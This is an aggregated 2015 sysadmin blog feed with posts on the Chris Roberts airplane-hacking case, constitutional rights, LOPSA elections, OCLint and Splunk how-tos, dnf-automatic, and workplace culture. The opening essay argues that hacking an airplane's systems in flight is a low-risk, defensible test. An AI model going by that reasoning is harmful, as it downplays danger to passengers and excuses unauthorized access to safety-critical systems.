It's almost certain that the FBI's account of events is not accurate. The technical details are garbled in the affidavit. The FBI is notorious for hearing what they want to hear from a subject, which is why for years their policy has been to forbid recording devices during interrogations. If they need Roberts to have said "I hacked a plane" in order to get a search warrant, then that's what their notes will say. It's like cops who will yank the collar of a drug sniffing dog in order to "trigger" on drugs so that they have an excuse to search the car.

Also, security researchers are notorious for being misunderstood. Whenever we make innocent statements about what we "could" do, others often interpret this either as a threat or a statement of what we already have done.

Assuming this scenario is true, that Roberts did indeed control the plane briefly, many claim that this is especially reprehensible because it endangered lives. That's the wrong way of thinking about it. Yes, it would be wrong because it means accessing computers without permission, but the "endangered lives" component doesn't necessarily make things worse.

Many operate under the principle that you can't put a price on a human life. That is false, provably so. If you take your children with you to the store, instead of paying the neighbor $10 to babysit them, then you've implicitly put a price on your children's lives. Traffic accidents near the home are the leading cause of death for children. Driving to the store is a vastly more dangerous than leaving the kids at home, so you've priced that danger around $10.

Likewise, society has limited resources. Every dollar spent on airline safety has to come from somewhere, such as from AIDS research. With current spending, society is effectively saying that airline passenger lives are worth more than AIDS victims.

Does pentesting an airplane put passenger lives in danger? Maybe. But then so does leaving airplane vulnerabilities untested, which is the current approach. I don't know which one is worse -- but I do know that your argument is wrong when you claim that endangering planes is unthinkable. It is thinkable, and we should be thinking about it. We should be doing the math to measure the risk, pricing each of the alternatives.

It's like whistleblowers. The intelligence community hides illegal mass surveillance programs from the American public because it would be unthinkable to endanger people's lives. The reality is that the danger from the programs is worse, and when revealed by whistleblowers, nothing bad happens.

The same is true here. Airlines assure us that planes are safe and cannot be hacked -- while simultaneously saying it's too dangerous for us to try hacking them. Both claims cannot be true, so we know something fishy is going on. The only way to pierce this bubble and find out the truth is to do something the airlines don't want, such as whistleblowing or live pentesting.

The systems are built to be reset and manually overridden in-flight. Hacking past the entertainment system to prove one could control the airplane introduces only a tiny danger to the lives of those on-board. Conversely, the current "security through obscurity" stance of the airlines and FAA is an enormous danger. Deliberately crashing a plane just to prove it's possible would of course be unthinkable. But, running a tiny risk of crashing the plane, in order to prove it's possible, probably will harm nobody. If never having a plane crash due to hacking is your goal, then a live test on a plane during flight is a better way of doing this than the current official polices of keeping everything secret. The supposed "unthinkable" option of live pentest is still (probably) less dangerous than the "thinkable" options.

I'm not advocating anyone do it, of course. There are still better options, such as hacking the system once the plane is on the ground. My point is only that it's not an unthinkable danger. Those claiming it is haven't measure the dangers and alternatives.

The same is true of all security research. Those outside the industry believe in security-through-obscurity, that if only they can keep details hidden and pentesters away from computers, then they will be safe. We inside the community believe the opposite, in Kerckhoff's Principle of openness, and that the only trustworthy systems are those which have been thoroughly attacked by pentesters. There is a short term cost of releasing vulns in Adobe Flash, because hackers will use them. But the long term benefit is that this leads to a more secure Flash, and better alternatives like HTML5. If you can't hack planes in-flight, then what you are effectively saying is that our believe in Kerckhoff's Principle is wrong.

Each year, people die (or get permanently damaged) from vaccines. But we do vaccines anyway because we are rational creatures who can do math, and can see that the benefits of vaccines are a million to one times greater than the dangers. We look down on the anti-vaxxers who rely upon "herd immunity" and the fact the rest of us put our children through danger in order to protect their own. We should apply that same rationality to airline safety. If you think pentesting live airplanes is unthinkable, then you should similarly be able to do math and prove it, rather than rely upon irrational moral outrage.

I'm not arguing hacking airplanes mid-flight is a good idea. I'm simply pointing out it's a matter of math, not outrage.

by Robert Graham ( at May 16, 2015 03:45 AM

May 15, 2015

League of Professional System Administrators

Atom Powers announces his candidacy for Board Member.

I am Atom Powers, apowers on IRC, and I am running for the Board (and from the velociraptors).

You can see my full statement here: (Evernote Document)

by aelios at May 15, 2015 06:31 PM

Errata Security

Revolutionaries vs. Lawyers

I am not a lawyer; I am a revolutionary. I mention this in response to Volokh posts [1, 2] on whether the First Amendment protects filming police. It doesn't -- it's an obvious stretch, and relies upon concepts like a protected "journalist" class who enjoys rights denied to the common person. Instead, the Ninth Amendment, combined with the Declaration of Independence, is what makes filming police a right.

The Ninth Amendment simply says the people have more rights than those enumerated by the Bill of Rights. There are two ways of reading this. Some lawyers take the narrow view, that this doesn't confer any additional rights, but is just a hint on how to read the Constitution. Some take a more expansive view, that there are a vast number of human rights out there, waiting to be discovered. For example, some wanted to use the Ninth Amendment to insist "abortion" was a human right in Roe v. Wade. Generally, lawyers take the narrow view, because the expansive view becomes ultimately unworkable when everything is a potential "right".

I'm not a lawyer, but a revolutionary. For me, rights come not from the Constitution. Bill of Rights, or Supreme Court decision. They come from the Declaration of Independence, the "natural rights" assertion, but also things like the following phrase used to justify the colony's revolution:
...when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them [the people] under absolute Despotism, it is their right, it is their duty, to throw off such Government...
The state inevitably strives to protect its privilege and power at the expense of the people. The Bill of Rights exists to check this -- so that we don't need to resort to revolution every few decades. The First Amendment protects free speech not because this is a good thing, but because it's the sort of the thing the state wants to suppress to protect itself.

In this context, therefore, abortion isn't a "right". Abortion neither helps nor harms the despot's power. Whether or not it's a good thing, whether it should be legal, or even whether the constitution should mention abortion, isn't the issue. The only issue here is how it relates to government power.

Thus, we know that "recording police" is a right under the Declaration of Independence. The police want to suppress it, because it challenges their despotism. We've seen this in the last year, as films of police malfeasance has led to numerous protests around the country. If filming the police were illegal in the United States, this would be an usurpation that would justify revolt.

Everyone knows this, so they struggle to fit it within the constitution. In the article above, a judge uses fancy rhetoric to try to shoehorn it into the First Amendment. I suggest they stop resisting the Ninth and use that instead. They don't have to accept an infinite number of "rights" in order to use those clearly described in the Declaration of Independence. The courts should simply say filming police helps us resist despots, and is therefore protected by the Ninth Amendment channeling the Declaration of Independence.

The same sort of argument happens with the Fourth Amendment right to privacy. The current legal climate talks about a reasonable expectation of privacy. This is wrong. The correct reasoning should start with a reasonable expectation of abuse by a despot.

Under current reasoning about privacy, government can collect all phone records, credit card bills, and airline receipts -- without a warrant. That's because since this information is shared with a third party, the company you are doing business with, you don't have a "reasonable expectation of privacy".

Under my argument about the Ninth, this should change. We all know that a despot is likely to abuse these records to maintain their power. Therefore, in order to protect against a despot, the people have the right that this information should be accessible only with a warrant, and that all accesses by the government should be transparent to the public (none of this secret "parallel construction" nonsense).

We all know there is a problem here needing resolution. Cyberspace has put our "personal effects" in the cloud, where third parties have access to them, that we still want to be "private". We struggle with how that third party (like Facebook) might invade that privacy. We struggle with how the government might invade that privacy. It's a substantial enough change that I don't thing precedence guides us, not Katz, not Smith v Maryland. I think the only guidance comes from the founding documents. The current state of affairs means that cyberspace has made personal effects obsolete -- I don't think this is correct.

Lastly, this brings me to crypto backdoors. The government is angry because even if Apple were to help them, they still cannot decrypt your iPhone. The government wants Apple to put in a backdoor, giving the police a "Golden Key" that will decrypt any phone. The government reasonably argues that backdoors would only be used with a search warrant, and thus, government has the authority to enforce backdoors. The average citizen deserves the protection of the law against criminals who would use crypto to hide their evil deeds from the police. When an evil person has kidnapped, raped, and murdered your daughter, all data from their encrypted phone should be available to the police in order to convict them.

But here's the thing. In the modern, interconnected world, we can only organize a revolution against our despotic government if we can send backdoor-free messages among ourselves. This is unlikely to be much of a concern in the United States, of course, but it's a concern throughout the rest of the world, like Russia and China. The Arab Spring was a powerful demonstration of how modern technology mobilized the populace to force regime change. Despots with crypto backdoors would be able to prevent such things.

I use Russia/China here, but I shouldn't have to. Many argue that since America is free, and the government under the control of the people, that we operate under different rules than those other despotic countries. The Snowden revelations prove this wrong. Snowden revealed a secret, illegal, mass surveillance program that had been operating for six years under the auspices of all three branches (executive, legislative, judicial) and both Parties (Republican and Democrat). Thus, it is false that our government can be trusted with despotic powers. Instead, our government can only be trusted because we deny it despotic powers.

QED: the people have the right to backdoor-free crypto.

I write this because I often hang out with lawyers. They have a masterful command of all the legal decisions and precedent, such as the Katz decision on privacy. It's not that I disrespect their vast knowledge on the subject, or deny their reasoning is solid. It's that I just don't care. I'm a revolutionary. Cyberspace, 9/11, and the war on drugs has led to an alarming number of intolerable despotic usurpations. If you lawyer people believe nothing in the Constitution or Bill of Rights can prevent this, then it's our right, even our duty, to throw off the current system and institute one that can.

by Robert Graham ( at May 15, 2015 07:03 AM

May 14, 2015

League of Professional System Administrators

Candidate Statement for LOPSA Board 2015

Two years ago, I felt that LOPSA was poised for growth.  I was a bit early in that assessment as LOPSA was still burdened by debt that limited its ability to focus on the future.  That debt is now paid off and LOPSA can focus on the future - our future as system admins.  If relected, my goal is to help LOPSA re-align itself with where system administration is now and will be in the future; to support system admin education and new system admins just starting out; and to help LOPSA find a voice for itself.

read more

by ski at May 14, 2015 05:05 AM

Candidate Statement for LOPSA Board 2015

There's been a change at LOPSA recently.  Less talking, more doing.  My name is William Bilancio and I am proud to be part of that change. 
Recent accomplishments:

  • 5 successful conferences: I chaired the inaugural PICC 2010, mentored Cascadia IT 2011, 2012 and 2013 and coordinated the hotel/food and audio visual contracts and getting all the trainers for PICC 2011, 2012, LOPSA-East ‘13 and LOPSA-East ‘14.  All three were profitable before the doors opened.  A combined total of more than 150 new LOPSA memberships were gained and put over $9,000 in LOPSA's bank account.
  • Working on getting the LOPSA web site looking more modern and upgraded to Drupal 7 as well as getting forums up and running as well
  • Hosted the LOPSA board retreat at my office in NJ to save money for the past 4 years.
  • Member and chair of the LOPSA Education Committee since 2005, coordinating our efforts at SCALE, OLF and more.


read more

by wbilancio at May 14, 2015 12:50 AM

May 13, 2015

Warren Guy

Planet SysAdmin software update

I learned yesterday that some HTTPS blogs/feeds weren't being successfully polled by the (very old) PlanetPlanet software powering Planet SysAdmin. Rather than figuring out why software last maintained in 2006 isn't working properly in 2015, I upgraded to the more recent Planet Venus fork.

Everything should look and work the same as before. However as a consequence of rebuilding the Planet cache and being able to poll certain HTTPS blogs for the first time in a long time, some old posts from as early as 2008 have sneaked back into the feed today. If you notice any other problems with the Planet, please let me know!

Read full post

May 13, 2015 12:58 AM

May 12, 2015

LZone - Sysadmin


After a friend of mine suggested reading "The things you need to know to do web development I felt the need to compile a solution index for the experiences described. In this interesting blog post describes his view of the typical learning curve of a web developer and the tools, solutions and concepts he discovers when he becomes a successful developer.

I do not want to summarize the post but I wanted to compile a list of those solutions and concepts affecting the life of a web developer.

Markup Standards Knowledge HTML, CSS, JSON, YAML
Web Stack Layering Basic knowledge about
  • Using TCP as transport protocol
  • Using HTTP as application protocol
  • Using SSL to encrypt the application layer with HTTPS
  • Using SSL certificates to proof identity for websites
  • Using (X)HTML for the application layer
  • Using DOM to access/manipulate application objects
Web Development Concepts
  • 3 tier server architecture
  • Distinction of static/dynamic content
  • Asynchronous CSS, JS loading
  • Asynchronous networking with Ajax
  • CSS box models
  • CSS Media Queries
  • Content Delivery Networks
  • UX, Usability...
  • Responsive Design
  • Page Speed Optimization
  • HTTP/HTTPS content mixing
  • Cross domain content mixing
  • MIME types
  • API-Pattern: RPC, SOAP, REST
  • Localization and Internationalization
Developer Infrastructure
  • Code Version Repo: usually Git. Hosted or self-hosted e.g. gitlab
  • Continuous Integration: Jenkins, Travis
  • Deployment: Jenkins, Travis, fabric, Bamboo, CruiseControl
Frontend JS Frameworks Mandatory knowledge in jQuery as well as knowing one or more JS frameworks as

Bootstrap, Foundation, React, Angular, Ember, Backbone, Prototype, GWT, YUI
Localization and Internationalization Frontend: usually in JS lib e.g. LocalePlanet or Globalize

Backend: often in gettext or a similar mechanism
Precompiling Resources For Javascript: Minify

For CSS: For Images: ImageMagick

Test everything with Google PageSpeed Insights
Backend Frameworks By language
  • PHP: CakePHP, CodeIgniter, Symfony, Seagull, Zend, Yii (choose one)
  • Python: Django, Tornado, Pylons, Zope, Bottle (choose one)
  • Ruby: Rails, Merb, Camping, Ramaze (choose one)
Web Server Solutions nginx, Apache

For loadbalancing: nginx, haproxy

As PHP webserver: nginx+PHPFPM
RDBMS MySQL (maybe Percona, MariaDB), Postgres
Caching/NoSQL Without replication: memcached, memcachedb, Redis

With replication: Redis, Couchbase, MongoDB, Cassandra

Good comparisons: #1 #2
Hosting If you are unsure about self-hosting vs. cloud hosting have a look at the Cloud Calculator.
Blogs Do not try to self-host blogs. You will fail on keeping them secure and up-to-date and sooner or later they are hacked. Start with a blog hoster right from the start: Choose provider

May 12, 2015 04:00 PM

Static Code Analysis of any Autotools Project with OCLint

The following is a HowTo describing the setup of OCLint for any C/C++ project using autotools.

1. OCLint Setup

First step is downloading OCLint, as there are no package so far, it's just extracting the tarball somewhere in $HOME. Check out the latest release link on
wget ""
tar zxvf oclint-0.8.1-x86_64-linux-3.13.0-35-generic.tar.gz 
This should leave you with a copy of OCLint in ~/oclint-0.8.1

2. Bear Setup

As project usually consist of a lot of source files in different subdirectories it is hard for a linter to know where to look for files. While "cmake" has support for dumping a list of source files it processes during a run "make" doesn't. This is where the "Bear" wrapper comes to play: instead of
you run
bear make
so "bear" can track all files being compiled. It will dump a JSON file "compile_commands.json" which OCLint can use to do analysis of all files.

To setup Bear do the following
git clone
cd Bear
cmake .

3. Analyzing Code

Now we have all the tools we need. Let's download some autotools project like Liferea. Before doing code analysis it should be downloaded and build at least once:
git clone
cd liferea
Now we collect all code file compilation instructions with bear:
make clean
bear make
And if this succeed we can start a complete analysis with
which will run OCLint with the input from "compile_commands.json" produced by "bear". Don't call "oclint" directly as you'd need to pass all compile flags manually.

If all went well you could see code analysis lines like those:
conf.c:263:9: useless parentheses P3 
conf.c:274:9: useless parentheses P3 
conf.c:284:9: useless parentheses P3 
conf.c:46:1: high cyclomatic complexity P2 Cyclomatic Complexity Number 33 exceeds limit of 10
conf.c:157:1: high cyclomatic complexity P2 Cyclomatic Complexity Number 12 exceeds limit of 10
conf.c:229:1: high cyclomatic complexity P2 Cyclomatic Complexity Number 30 exceeds limit of 10
conf.c:78:1: long method P3 Method with 55 lines exceeds limit of 50
conf.c:50:2: short variable name P3 Variable name with 2 characters is shorter than the threshold of 3
conf.c:52:2: short variable name P3 Variable name with 1 characters is shorter than the threshold of 3

May 12, 2015 04:00 PM

Splunk Cheat Sheet

Basic Searching Concepts

Simple searches look like the following examples. Note that there are literals with and without quoting and that there are field selections with an "=":
Exception                # just the word
One Two Three            # those three words in any order
"One Two Three"          # the exact phrase

# Filter all lines where field "status" has value 500 from access.log source="/var/log/apache/access.log" status=500

# Give me all fatal errors from syslog of the blog host host="myblog" source="/var/log/syslog" Fatal

Basic Filtering

Two important filters are "rex" and "regex".

"rex" is for extraction a pattern and storing it as a new field. This is why you need to specifiy a named extraction group in Perl like manner "(?...)" for example
source="some.log" Fatal | rex "(?i) msg=(?P[^,]+)"
When running above query check the list of "interesting fields" it now should have an entry "FIELDNAME" listing you the top 10 fatal messages from "some.log"

What is the difference to "regex" now? Well "regex" is like grep. Actually you can rephrase
source="some.log" Fatal
source="some.log" | regex _raw=".*Fatal.*"
and get the same result. The syntax of "regex" is simply "=". Using it makes sense once you want to filter for a specific field.


Sum up a field and do some arithmetics:
... | stats sum(<field>) as result | eval result=(result/1000)
Determine the size of log events by checking len() of _raw. The p10() and p90() functions are returning the 10 and 90 percentiles:
| eval raw_len=len(_raw) | stats avg(raw_len), p10(raw_len), p90(raw_len) by sourcetype

Simple Useful Examples

Splunk usually auto-detects access.log fields so you can do queries like:
source="/var/log/nginx/access.log" HTTP 500
source="/var/log/nginx/access.log" HTTP (200 or 30*)
source="/var/log/nginx/access.log" status=404 | sort - uri 
source="/var/log/nginx/access.log" | head 1000 | top 50 clientip
source="/var/log/nginx/access.log" | head 1000 | top 50 referer
source="/var/log/nginx/access.log" | head 1000 | top 50 uri
source="/var/log/nginx/access.log" | head 1000 | top 50 method

Emailing Results

By appending "sendemail" to any query you get the result by mail!
... | sendemail to=""


Create a timechart from a single field that should be summed up
... | table _time, <field> | timechart span=1d sum(<field>)
... | table _time, <field>, name | timechart span=1d sum(<field>) by name

Index Statistics

List All Indices
 | eventcount summarize=false index=* | dedup index | fields index
 | eventcount summarize=false report_size=true index=* | eval size_MB = round(size_bytes/1024/1024,2)
 | REST /services/data/indexes | table title
 | REST /services/data/indexes | table title splunk_server currentDBSizeMB frozenTimePeriodInSecs maxTime minTime totalEventCount
on the command line you can call
$SPLUNK_HOME/bin/splunk list index
To query write amount of per index the metrics.log can be used:
index=_internal source=*metrics.log group=per_index_thruput series=* | eval MB = round(kb/1024,2) | timechart sum(MB) as MB by series
MB per day per indexer / index
index=_internal metrics kb series!=_* "group=per_host_thruput" monthsago=1 | eval indexed_mb = kb / 1024 | timechart fixedrange=t span=1d sum(indexed_mb) by series | rename sum(indexed_mb) as totalmb

index=_internal metrics kb series!=_* "group=per_index_thruput" monthsago=1 | eval indexed_mb = kb / 1024 | timechart fixedrange=t span=1d sum(indexed_mb) by series | rename sum(indexed_mb) as totalmb

May 12, 2015 04:00 PM

The FreeBSD Diary

ZFS benchmark

I have more RAM, how will this affect things?

May 12, 2015 03:58 PM

DLT drive replacement

Out with the old, in with the new!

May 12, 2015 03:58 PM

DLT labels

Tapes without labels in a library should not happen

May 12, 2015 03:58 PM

Life of a Sysadmin

System installation, or licenses for redistribution

Part of my job is to prep Windows laptops for coworkers; it is my goal to provide laptops fully setup, this means among other things, I need to have Adobe Reader and Adobe Flash Player installed when they recieve the machine. Unfortunately Adobe wishes to make that a little difficult.

The license for Adobe Reader however does not permit me as IT support for an employee to distribute Adobe Reader on a machine I am providing to the employee. Adobe would want me to simply point the employee at the download site for Adobe Reader.

For me to distribute these products, I am supposed to agree to a different license agreement, one intended for distribution. This likely isn't a problem for most as most IT employees, as most never actually read license agreements. My company however has a clear policy that employees are not allowed to agree to contracts without the approval of the lawyers.

Considering that Adobe is interested in having Adobe Reader and Flash Player installed on as many machines as possible, why must they throw additional obstcles in my way?

May 12, 2015 03:58 PM

Let's touch base, or Harassment

I have spoken with many salespeople in the past week. In the past week, I have spoken with over a dozen salespeople (I sought pricing on business cellphone plans and a new photocopier). I have heard the phrase "I just wanted to touch base" many times. I have grown to have a great dislike of that phrase.

I do believe that every time I have heard "I just wanted to touch base" in the last seven days, it was prefaced by an interrupting phone call and followed by an annoying couple of minutes of a sales weasel not accepting my quite clear and simple statement of "Thank you for the quote, I am evaluating all of the options and will get back to you with questions, concerns, or with our decision." I wouldn't hold the phone call against them if I had not made it abundantly clear to each of these people that email is my preferred method of contact. Worse is that in most cases, it has taken more than a few such phone calls from each of them to get them to leave me alone.

So ignoring the sexual harassment angle of the phrase I am clearly starting to associate the phrase with annoyance.

May 12, 2015 03:58 PM

Sysadmins Law 9, or Backups must be automated

We have a reasonable system to perform backups of laptops that are regularly on our local network. For laptops that live most of their life connected to the office over the internet and through a VPN connection it is much harder. Instead of an automated backup, the user must initiate the backup themselves. Automated messages are sent out when it has been a week without backups. And I talk to them on the phone a few days after that if a backup hasn't been done.

He came into my office complaining that his laptop blue-screened on boot, and it had been crashing regularly for the few days before. Booting off other media quickly showed the disk was failing in a pretty spectacular way. When I inform the user of this, he says, "I guess I should have backed up like you told me to, eh?" Yeah, I guess so.

Which brings me to sysadmin law 9

Backups that are not automated are not done.

May 12, 2015 03:58 PM

Racker Hacker

Automatic package updates with dnf

12428002945_bc47ae3529_bWith Fedora 22’s release date quickly approaching, it’s time to familiarize yourself with dnf. It’s especially important since clean installs of Fedora 22 won’t have yum.

Almost all of the command line arguments are the same but automated updates are a little different. If you’re used to yum-updatesd, then you’ll want to look into dnf-automatic.


Getting the python code and systemd unit files for automated dnf updates is a quick process:

dnf -y install dnf-automatic


There’s only one configuration file to review and most of the defaults are quite sensible. Open up /etc/dnf/automatic.conf with your favorite text editor and review the available options. The only adjustment I made was to change the emit_via option to email as opposed to the stdio.

You may want to change the email_to option if you want to redirect email elsewhere. In my case, I already have an email forward for the root user.

dnf Automation

If you look at the contents of the dnf-automatic package, you’ll find some python code, configuration files, and two important systemd files:

# rpm -ql dnf-automatic | grep systemd

These systemd files are what makes dnf-automatic run. The service file contains the instructions so that systemd knows what to run. The timer file contains the frequency of the update checks (defaults to one day). We need to enable the timer and then start it:

systemctl enable dnf-automatic.timer
systemctl start dnf-automatic.timer

Check your work:

# systemctl list-timers *dnf*
NEXT                         LEFT     LAST                         PASSED    UNIT                ACTIVATES
Tue 2015-05-12 19:57:30 CDT  23h left Mon 2015-05-11 19:57:29 CDT  14min ago dnf-automatic.timer dnf-automatic.service

The output here shows that the dnf-automatic job last ran at 19:57 on May 11th and it’s set to run at the same time tomorrow, May 12th. Be sure to disable and stop your yum-updatesd service if you still have it running on your system from a previous version of Fedora.

Photo Credit: Outer Rim Emperor via Compfight cc

The post Automatic package updates with dnf appeared first on

by Major Hayden at May 12, 2015 01:22 AM

May 10, 2015


What Year Is This?

I recently read a manuscript discussing computer crime and security. I've typed out several excerpts and published them below. Please read them and try to determine how recently this document was written.

The first excerpt discusses the relationship between the computer and the criminal.

"The impersonality of the computer and the fact that it symbolizes for so many a system of uncaring power tend not only to incite efforts to strike back at the machine but also to provide certain people with a set of convenient rationalizations for engaging in fraud or embezzlement. The computer lends an ideological cloak for the carrying out of criminal acts.

Computer crime... also holds several other attractions for the potential lawbreaker. It provides intellectual challenge -- a form of breaking and entering in which the burglar’s tools are essentially an understanding of the logical structure of and logical flaws inherent in particular programming and processing systems. It opens the prospect of obtaining money by means that, while clearly illegal, do not usually involve taking it directly from the till or the cashier’s drawer...

Other tempting features of computer crime, as distinct from other forms of criminal activity, are that most such crimes are difficult to detect and that when the guilty parties are detected not much seems to happen to them. For various reasons, they are seldom intensively prosecuted, if they are prosecuted at all. On top of these advantages, the haul from computer crime tends to be very handsome compared with that from other crimes."

The second excerpt describes the attitudes of corporate computer crime victims.

"The difficulties of catching up with the people who have committed computer crimes is compounded by the reluctance of corporations to talk about the fact that they have been defrauded and by the difficulties and embarrassments of prosecution and trial. In instance after instance, corporations whose assets have been plundered -- whose computer operations have been manipulated to churn out fictitious accounting data or to print large checks to the holders of dummy accounts -- have preferred to suffer in silence rather than to have the horrid facts about the frailty of their miracle processing systems come to public attention.

Top management people in large corporations fear that publicity about internal fraud could well affect their companies’ trading positions on the stock market, hold the corporations up to public ridicule, and cause all sorts of turmoil within their staffs. In many cases, it seems, management will go to great lengths to keep the fact of an internal computer crime from its own stockholders...

The reluctance of corporations to subject themselves to unfavorable publicity over computer crimes is so great that some corporations actually seem willing to take the risk of getting into trouble with the law themselves by concealing crimes committed against them. Among independent computer security consultants, it is widely suspected that certain banks, which seem exceptionally reluctant to admit that such a thing as computer fraud even exists in the banking fraternity, do not always report such crimes to the Comptroller of the Currency, in Washington, when they occur, as all banks are required to do by federal law. Bank officers do not discuss the details of computer crime with the press... [A] principal reason for this kind of behavior is the fear on the part of the banks that such a record will bring about an increase in their insurance rates."

The third excerpt talks about the challenges of prosecuting computer crime.

"In addition to the problems of detecting and bringing computer crimes to light, there are the difficulties of effectively prosecuting computer criminals. In the first place, the police, if they are to collect evidence, have to be able to understand precisely how a crime may have been committed, and that usually calls for the kind of technical knowledge that is simply not available to most police departments...

Another difficulty is that not only police and prosecutors but judges and juries must be able to find their way through the mass of technical detail before they can render verdicts and hand down decisions in cases of computer crime, and this alone is a demanding task. In the face of all the complexities involved and all the time necessary to prepare a case that will stand up in court, many prosecutors try to make the best accommodation they can with the defendant’s lawyers by plea bargaining, or else they simply allow the case to fade away unprosecuted. If they do bring a case to trial, they have the problem of presenting evidence that is acceptable to the court.

The fourth excerpt mentions "sophistication" -- a hot topic!

To somebody looking at the problem of computer crime as a whole, one conclusion that seems reasonable is that although some of the criminal manipulators of computer systems have shown certain ingenuity, they have not employed highly sophisticated approaches to break into and misuse computer systems without detection. In a way, this fact in itself is something of a comment on the security of most existing computer systems: the brains are presumably available to commit those  sophisticated computer crimes, but the reason that advanced techniques haven’t been used much may well be that the haven’t been necessary."

The fifth excerpt briefly lists possible countermeasures.

"The accelerating incidence of computer-related crimes -- particularly in the light of the continuing rapid growth of the computer industry and the present ubiquity of electronic data-processing systems -- raises the question of what countermeasures can be taken within industry and government to prevent such crimes, or, at least, to detect them with precision when they occur...

In addition to tight physical security for facilities, these [countermeasures] included such internal checks within a system to insure data security as adequate identification procedures for people communicating with the computer... elaborate internal audit trails built into a system, in which every significant communication between a user and a computer would be recorded; and, where confidentiality was particularly important, cryptography..."

Now based on what you have read, I'd like you to guess in which decade these excerpts were written? By answering the survey you will learn the publication date.


I'll leave you with one other quote from the manuscript:

The fact is, [a security expert] said, that “the data-security job will never be done -- after all, there will never be a bank that absolutely can’t be robbed.” The main thing, he said, is to make the cost of breaching security so high that the effort involved will be discouragingly great.

by Richard Bejtlich ( at May 10, 2015 10:15 PM

May 08, 2015


In search of a better class of asshole

The No Asshole Rule is a very well known criteria for building a healthy workplace. If you've worked in a newer company (say, incorporated within the last 8 years) you probably saw this or something much like it in the company guidelines or orientation. What you may not have seen were the principles.

Someone is an asshole if:

    1. After encountering the person, do people feel oppressed, humiliated or otherwise worse about themselves?
    2. Does the person target people who are less powerful than them?

If so, they are an asshole and should be gotten rid of.

And if we all did this, the tech industry would be a much happier place. It's a nice principle.

The problem is that the definition of 'asshole' is an entirely local one, determined by the office culture. This has several failure-modes.

Anyone who doesn't agree with the team-leader/boss is an asshole.

Quite a perversion of the intent of the rule, as this definitely harms those less powerful than the oppressor, but this indeed happens. Dealing with it requires a higher order of power to come down on the person. Which doesn't happen if the person is the owner/CEO. Employees take this into their own hands by working somewhere else for someone who probably isn't an asshole.

All dissent to power must be politely phrased and meekly accepting of rejection.

In my professional opinion, sir, I believe the cost-model presented here is overly optimistic in several ways.

I have every confidence in it.

Yes sir.

The thinking here is that reasoned people talk to each other in reasoned ways, and raised voices or interruptions are a key sign of an unreasonable person. Your opinion was tried, and adjudged lacking; lose gracefully.

In my professional opinion, sir, I believe the cost-model presented here is overly optimistic in several ways.

I have every confidence in it.

The premise you've built this on doesn't take into account the ongoing costs for N. Which throws off the whole model.

Mr. Anderson, I don't appreciate your tone.

It's a form of tone policing.

All dissent between team-mates must be polite, reasoned, and accountable to everyone's feelings.

Sounds great. Until you get a tone cop in the mix who uses the asshole-rule as a club to oppress anyone who disagrees with them.

I'm pretty sure this new routing method introduces at least 10% more latency to that API path. If not more.

I worked on that for a week. I'm feeling very intimidated right now.

😝. Sorry, I'm just saying that there are some edge cases we need to explore before we merge it.


Okay, let's merge it into Integration and run the performance suite on it.

This is a classic bit of office-politics judo. Because no one wants to be seen as an asshole, if you can make other people feel like one they're more likely to cave on contentious topics.

Which sucks big-time for people who actually have problems with something. Are they a political creature, or are they owning their pain?

The No Asshole Rule is a great principle in the abstract, but it took the original author 224 pages to communicate the whole thing in the way he intended it. That's 223.5 pages longer than most people have the attention-span for, especially in workplace orientations, and are therefore not going to be clued into the nuances. It is inevitable that a 'no asshole rule' enshrined in a corporate code-of-conduct is going to be defined organically through the culture of the workplace and not by any statement of principles.

That statement of principles may exist, but the operational definition will be defined by the daily actions of everyone in that workplace. It is going to take people at the top using the disciplinary hammer to course-correct people into following the listed principles, or it isn't going to work. And that hammer itself may include any and all of the biases I lined out above.

Like any code of conduct, the or else needs to be defined, and follow-through demonstrated, in order for people to give it appropriate attention. Vague statements of principles like no assholes allowed or be excellent to each other, are not enforceable codes as there is no way to objectively define them without acres of legalese.

by SysAdmin1138 at May 08, 2015 07:31 PM

May 07, 2015

Michael Biven

Leadership, Mentoring and Team Chemistry, the Soft Skills needed for DevOps

When I wrote that as a profession we’ve only scratched the surface of applying the ideas from DevOps and that we’ve been focused on the tools side of things I had thoughts in mind on how to address the points I raised.

One is the importance of mentoring and leadership as part of creating successful teams. During my career as a fire fighter I was lucky enough to learn these points by example from some amazing people. These ideas were not just part of our culture, they were expected and they’re what I want to share with you.

Any team requires both members and leaders. Nothing earth shattering there. But when you have a culture of mentoring and solid leadership that mix of people can grow into a successful team existing as long as you can keep them.

Our field is ever changing and a chaotic environment and that’s what draws some of us to to. It requires attention to what is going on and it gives each of us opportunities to learn something new or revisit old ideas again.

OK quick side note… while writing this autocorrect changed revisit to resist. Not sure if my text editor was trying to tell me something.

What we cannot have is that same pace of change and chaos reflected in the teams themselves. The leaders in each team who step-up to take on different roles need to provide stability. They include the official (tech leads, managers, and directors) and the unofficial ( experienced engineers who’ve earned the respect of their peers).

As a leader you become responsible for your team. Their needs, problems, and failures become yours, but just remember that their successes are their own. It means that you will need to be a good listener while also providing honest and direct feedback. You will need to provide a calm and positive outlook on the work at hand no matter what difficult challenges you are facing. Your job becomes not keeping the system, site or service up, it becomes keeping your team up.

The other important role a leader performs is clearly communicating to everyone the current situation, the challenges ahead and the goals for not only the team, but for the entire organization. If you have a team of capable people and have this type of clear and transparent communication going in both directions they should be able to prevail against almost any problem they face.

One of the best descriptions I’ve seen of what this looks like was from Gene Kranz.

“There, we learn the difference between the ‘I’ and the ‘we’ component of the team, because when the time comes, we need our people to step forward, take the lead, make their contribution, and then when they’re through, return to the role as a member of the team.” Kranz then went on to explain the “chemistry” aspect of a team: “it amplifies the individual’s talents as well as the team’s talent. Chemistry leads to communication that is virtually intuitive, because we must know when the person next to us needs help, a few more seconds to come up with an answer.”

— Apollo 13 Flight Director Gene Kranz speaking at the National Air and Space Museum on April 8 2005

The fact that this type of chemistry has to be cultivated over time is really an completely separate subject. But the short of it is you can’t have a team that performs at that level without having them do the work, responding to outages, and training together. That last bit is something that’s sorely missed in many operations teams.

One way to help encourage this type of dynamic and to continue to pass down the institutional memory from one generation to the next is by making mentoring a key part of your teams.

This includes both mentoring new members who join, but also existing people who have stepped up into more senior or different roles. Once you’re no longer the new person doesn’t mean that you shouldn’t be the mentoree anymore.

There is already a bit of inertia that you will be fighting against that actually discourages all of this. As a profession we tend to stay in our perspective technology silos without stepping outside to see how other tools and languages have approached similar problems. We end up disregarding the results of other smart people who already addressed what we’re working on.

Then we have ageism continuing to bleed out knowledge from some of our peers who just happen to have years of experience. Think of the idea that everything comes back again or ideas are cyclical.

